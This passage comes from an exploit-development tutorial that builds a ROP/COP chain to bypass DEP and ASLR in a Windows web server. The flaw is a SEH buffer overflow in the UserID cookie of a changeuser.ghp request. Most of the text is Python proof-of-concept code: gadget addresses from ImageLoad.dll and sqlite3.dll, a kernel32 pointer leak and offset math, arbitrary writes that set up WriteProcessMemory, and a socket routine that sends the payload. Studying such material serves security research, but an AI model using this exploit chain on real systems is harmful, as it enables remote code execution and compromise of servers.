crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)

It should also be noted, that after each of these ROP gadgets are executed - the AL register will be increased by 0x39 bytes. We will compensate for this in the future. Since AL only makes up the lower 8 bits of the EAX register, this will not have much of an adverse effect on what we are trying to accomplish.

The state of the registers before execution can be seen below.

ECX, after the ROP gadgets are executed, is loaded with the address for the nSize parameter placeholder.

A nice gadget can be found, after parsing the PE, to overwrite the parameter placeholder with the legitimate parameter.

crash += struct.pack('<L', 0x1001f5b4)    # mov dword ptr [ecx], edx

The state of the parameters before the overwrite occurs can be seen below.

As we can see, the junk 0x22222222 parameter will be the target for the overwrite.

Stepping through the instruction, we have dynamically changed the parameter placeholder for nSize to the legitimate parameter!


Perfect! All that is left now is to is extract our current pointer to kernel32.dll and calculate the offset between kernel32WriteFileImplementation and kernel32!WriteProcessMemory. After this, we will use the same primitive of dynamically manipulating the kernel32WriteProcessMemory parameter placeholder to point to the actual API.

Currently. ECX (the register we have been leveraging for each of the arbitrary writes to overwrite function parameter placeholders), is 0x14 (20 decimal) bytes away from the kernel32!WriteProcessMemory parameter placeholder.

Knowing this, we will prepare another arbitrary write by decrementing ECX by 0x14 bytes.

crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)

Once the ROP gadgets have executed, ECX now contains the same address as the parameter placeholder for kernel32!WriteProcessMemory.

The goal now is to dereference the kernel32!WriteProcessMemory parameter placeholder and place it in a CPU register we have control over.

Since ECX is reserved for the arbitrary write, we will use EAX to also store the kernel32!WriteProcessMemory parameter placeholder.

Recall that EDX still contains a value of 0x180, from the nSize parameter. After all, we have not manipulated EDX since. Conveniently, the current distance between the address within EAX and the kernel32!WriteProcessMemory parameter placeholder is 0x260.

Since we already have a routine of ROP and COP gadgets that increases EDX 0x180 bytes, we can utilize the EXACT same routine to increase it another 0x180 bytes - which will give us a value of 0x260! Once EDX contains the value of 0x260, we can subtract it from EAX and place the difference in EAX. This will allow us to store the kernel32!WriteProcessMemory parameter placholder in EAX. This time, however, since EDI already contains the old “return to the stack” routine - we can just directly add to EDX.

crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

After the add edx COP gadgets execute, EDX contains the distance between the kernel32!WriteProcessMemory and EAX (which is 0x260).

After the COP gadgets execute, the sub eax, edx ; ret gadget takes over execution - resulting in EAX now containing the address of the kernel32!WriteProcessMemory parameter placeholder.

So currently, as it stands, the stack address of 0x2636920, which changes when the process restarts, points to 0x61c832e4 - which then points to the kernel32.dll address. This means we have a pointer to a pointer to the pointer we would like to extract. Knowing this, we will dereference 0x2636920 and store the result (which is 0x61c832e4) into EAX. Then, utilizing the exact same routine, we will dereference 0x61c832e4 (which is a pointer to kernel32!WriteFileImplementation) and store the result in EAX. We can achieve this with two ROP gadgets.

crash += struct.pack('<L', 0x1002248c)    # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1002248c)    # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)

Program execution hits the first gadget, where WinDbg shows us what will be placed in EAX (0x61c832e4).

Utilizing the same ROP gadget, we successfully extract a pointer to kernel32.dll into EAX - dynamically!

This is great news. We have defeated ASLR on the system itself. What needs to happen now is that we need to find the offset between kernel32!WriteProcessMemory and kernel32WriteFileImplementation. To do this, we can use WinDbg.

Great! The distance between the two functions is 0xfffaca4d (remember, to avoid NULL bytes - we use the negative distance).

However, if we subtract these two values - it seems as though there is an issue and kernel32!WriteProcessMemory is not extracted properly.

Instead of fighting with two’s complement math - let’s just use a different function from the IAT. Preferably, let’s find a function that is less than in value, in terms of the virtual address, than kernel32!WriteProcessMemory.

Looking at the IAT for ImageLoad, we can see there is a nice IAT entry that points to kernel32!GetStartupInfoA.

Subtracting the two functions results in a value of 0xfffffd2d - and also yields our desired output!

Now that we have solved this issue, let’s show the full PoC up until this point.

import sys
import os
import socket
import struct

# 4063 byte SEH offset
# Stack pivot lands at padding buffer to SEH at offset 2563
crash = "\x90" * 2563

# Stack pivot lands here
# Beginning ROP chain

# Saving address near ESP for relative calculations into EAX and ECX
# EBP is near stack address
crash += struct.pack('<L', 0x61c05e8c)    # xchg eax, ebp ; ret: sqlite3.dll (non-ASLR enabled module)

# EAX is now 0xfec bytes away from ESP. We want current ESP + 0x28 (to compensate for loading EAX into ECX eventually) into EAX
# Popping negative ESP + 0x28 into ECX and subtracting from EAX
# EAX will now contain a value at ESP + 0x24 (loading ESP + 0x24 into EAX, as this value will be placed in EBP eventually. EBP will then be placed into ESP - which will compensate for ROP gadget which moves EAX into EAX via "leave")
crash += struct.pack('<L', 0x10018606)    # pop ecx, ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xffffefe0)    # Negative ESP + 0x28 offset
crash += struct.pack('<L', 0x1001283e)    # sub eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled module)

# This gadget is to get EBP equal to EAX (which is further down on the stack) - due to the mov eax, ecx ROP gadget that eventually will occur.
# Said ROP gadget has a "leave" instruction, which will load EBP into ESP. This ROP gadget compensates for this gadget to make sure the stack doesn't get corrupted, by just "hopping" down the stack
# EAX and ECX will now equal ESP - 8 - which is good enough in terms of needing EAX and ECX to be "values around the stack"
crash += struct.pack('<L', 0x61c30547)    # add ebp, eax ; ret sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c6588d)    # mov ecx, eax ; mov eax, ecx ; add esp, 0x24 ; pop ebx ; leave ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget (pop ebx)
crash += struct.pack('<L', 0x90909090)    # Padding to compensate for above ROP gadget (pop ebp in leave instruction)

# Jumping over kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x10015eb4)    # add esp, 0x1c ; ret: ImageLoad.dll (non-ASLR enabled module)

# kernel32!WriteProcessMemory placeholder parameters
crash += struct.pack('<L', 0x1004d1ec)    # Pointer to kernel32!GetStartupInfoA (no pointers from IAT directly to kernel32!WriteProcessMemory, so loading pointer to kernel32.dll and compensating later.)
crash += struct.pack('<L', 0x61c72530)    # Return address parameter placeholder (where function will jump to after execution - which is where shellcode will be written to. This is an executable code cave in the .text section of sqlite3.dll)
crash += struct.pack('<L', 0xFFFFFFFF)    # hProccess = handle to current process (Pseudo handle = 0xFFFFFFFF points to current process)
crash += struct.pack('<L', 0x61c72530)    # lpBaseAddress = pointer to where shellcode will be written to. (0x61C72530 is an executable code cave in the .text section of sqlite3.dll) 
crash += struct.pack('<L', 0x11111111)    # lpBuffer = base address of shellcode (dynamically generated)
crash += struct.pack('<L', 0x22222222)    # nSize = size of shellcode 
crash += struct.pack('<L', 0x1004D740)    # lpNumberOfBytesWritten = writable location (.idata section of ImageLoad.dll address in a code cave)

# Starting with lpBuffer (shellcode location)
# ECX currently points to lpBuffer placeholder parameter location - 0x18
# Moving ECX 8 bytes before EAX, as the gadget to overwrite dword ptr [ecx] overwrites it at an offset of ecx+0x8
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)    # inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)

# Pointing EAX (shellcode location) to data inside of ECX (lpBuffer placeholder) (NOPs before shellcode)
crash += struct.pack('<L', 0x1001fce9)    # pop esi ; add esp + 0x8 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xfffffd44)    # Shellcode is about negative 0xfffffd44 bytes away from EAX
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x10022f45)    # sub eax, esi ; pop edi ; pop esi ; ret
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensate for above ROP gadget

# Changing lpBuffer placeholder to actual address of shellcode
crash += struct.pack('<L', 0x10021bfb)    # mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-ASLR enabled module)

# nSize parameter (0x180 = 384 bytes)
crash += struct.pack('<L', 0x100103ff)    # pop edi ; ret: ImageLoad.dll (non-ASLR enabled module) (Compensation for COP gadget add edx, 0x20)
crash += struct.pack('<L', 0x1001c31e)    # add esp, 0x8 ; ret: ImageLoadl.dll (non-ASLR enabled module) (Returns to stack after COP gadget)
crash += struct.pack('<L', 0x10022c4c)    # xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

# Incrementing ECX to place the nSize parameter placeholder into ECX
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)

# Pointing nSize parameter placeholder to actual value of 0x180 (in EDX)
crash += struct.pack('<L', 0x1001f5b4)    # mov dword ptr [ecx], edx

# ECX currently is located at kernel32!WriteProcessMemory parameter placeholder - 0x8
# Need to first extract sqlite3.dll pointer (which is a pointer to kernel32) and then calculate offset from kernel32!GetStartupInfoA

# ECX = kernel32!WriteProcessMemory parameter placeholder + 0x14 (20)
# Decrementing ECX by 0x14 firstly (parameter is 0xc bytes in front of ECX. Subtracting ECX by 0xC to place placeholder in ECX. Additionally, the overwrite gadget writes to ECX at an offset of ECX+0x8. Adding 0x8 more bytes to compensate.)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)

# Extracting pointer to kernel32.dll into EAX

# EDX contains a value of 0x180 from nSize parameter
# EDI still contains return to stack ROP gadget for COP gadget compensation
# EAX is 0x260 bytes ahead of the kernel32!WriteProcessMemory parameter placeholder
# Subtracting 0x260 from EAX via EDX register
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)    # add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

# Loading kernel32!WriteProcessMemory parameter placeholder location into EAX to be dereferenced
crash += struct.pack('<L', 0x10015ce5)    # sub eax, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Extracting kernel32!WriteProcessMemory parameter placeholder
crash += struct.pack('<L', 0x1002248c)    # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1002248c)    # mov eax, dword [eax] ; ret: ImageLoad.dll (non-ASLR enabled module)

# 4063 total offset to SEH
crash += "\x41" * (4063-len(crash))

# SEH only - no nSEH because of DEP
# Stack pivot to return to buffer
crash += struct.pack('<L', 0x10022869)    # add esp, 0x1004 ; ret: ImageLoad.dll (non-ASLR enabled module)

# 5000 total bytes for crash
crash += "\x41" * (5000-len(crash))

# Replicating HTTP request to interact with the server
# UserID contains the vulnerability
http_request = "GET /changeuser.ghp HTTP/1.1\r\n"
http_request += "Host:\r\n"
http_request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\n"
http_request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
http_request += "Accept-Language: en-US,en;q=0.5\r\n"
http_request += "Accept-Encoding: gzip, deflate\r\n"
http_request += "Referer:\r\n"
http_request += "Cookie: SESSIONID=9349; UserID=" + crash + "; PassWD=;\r\n"
http_request += "Connection: Close\r\n"
http_request += "Upgrade-Insecure-Requests: 1\r\n"

print "[+] Sending exploit..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 80))

Now that we have an updated POC, let’s use a ROP routine to subtract this value from EAX.

# Preparing EDX by clearing it out
crash += struct.pack('<L', 0x10022c4c)    # xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Beginning calculations for EBX
crash += struct.pack('<L', 0x100141c8)    # pop ebx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xfffffd2d)    # Negative distance to kernel32!WriteProcessMemory

# Transferring EBX to EDX
crash += struct.pack('<L', 0x10022c1e)    # add edx, ebx ; pop ebx ; retn 0x10: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x90909090)    # Compensating for above ROP gadget

# Placing kernel32!WriteProcessMemory into EAX
crash += struct.pack('<L', 0x10015ce5)    # sub eax, edx ; ret: ImageLoad.dll (non-ASLR enabled module)

# ROP gadget compensations
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget
crash += struct.pack('<L', 0x90909090)    # Compensation for retn 0x10 in previous ROP gadget

The above routine will do the following:

  1. Zero out EDX
  2. Place the offset into EBX
  3. Move the offset to EDX
  4. Subtract the offset from EDX and EAX - placing the result in EAX

The negative distance between the two kernel32.dll pointers is loaded into EBX.

The distance is then loaded into EDX.

Program execution then reaches the sub eax, edx instruction.

This allows us to successfully extract kernel32!WriteProcessMemory!

Perfect! All there is left to do now is use our arbitrary write primitive to overwrite the kernel32WriteProcessMemory parameter placeholder on the stack with the actual address of kernel32!WriteProcessMemory.

If you can recall, we already decremented ECX to make it contain the address of the parameter placeholder. However, the ROP gadget we will use for our arbitrary write, does so with ECX at an offset of 0x8. To compensate for this, we will decrement ECX by 0x8 bytes. This way, when the arbitrary write gadget adds 0x8 to ECX, we will have already compensated.

crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)    # dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)

After we decrement ECX, we will use the arbitrary write gadget.

# Overwriting kernel32!WriteProcessMemory parameter placeholder with actual address of kernel32!WriteProcessMemory
crash += struct.pack('<L', 0x10021bfb)    # mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-ASLR enabled module)

Program execution reaches the arbitrary write - and we can see we will be overwriting our parameter placeholder - as intended.

The arbitrary write occurs, and we have successfully dynamically placed our parameters on the stack!

Now that everything has been configured properly, the final goal is to kick off this function call. To do so, we will need to load the stack address which points to kernel32!WriteProcessMemory into ESP - and return into it.

Currently, after the ECX manipulation, ECX contains a stack address 0x8 bytes above the stack address we want to load into ESP (this was due to compensation for the ECX + 0x8 arbitrary write ROP gadget). This means we want to increase ECX to contain the address on the stack in question.

The goal now will be to:

  1. Set ECX equal to the stack address pointing to kernel32!WriteProcessMemory
  2. Load ECX into EAX
  3. Exchange EAX and ESP, then return into ESP

Our last ROP routine can solve this issue!

crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)    # inc ecx ; add al, 0x39 ; ret: ImageLoad.dll (non-ASLR enabled module)

# Moving ECX into EAX
crash += struct.pack('<L', 0x1001fa0d)    # mov eax, ecx ; ret: ImageLoad.dll (non-ASLR enabled module)

# Exchanging EAX with ESP to fire off the call to kernel32!WriteProcessMemory
crash += struct.pack('<L', 0x61c07ff8)    # xchg eax, esp ; ret: sqlite3.dll (non-ASLR enabled module)

Let’s also add some breakpoints to “mimic” shellcode - directly after the xchg eax, esp ROP gadget.

# NOPs before shellcode
crash += "\x90" * 230

# Breakpoints
crash += "\xCC" * 200

Running the updated POC - we can see that the call to kernel32!WriteProcessMemory is complete - and that we have hit our breakpoints!

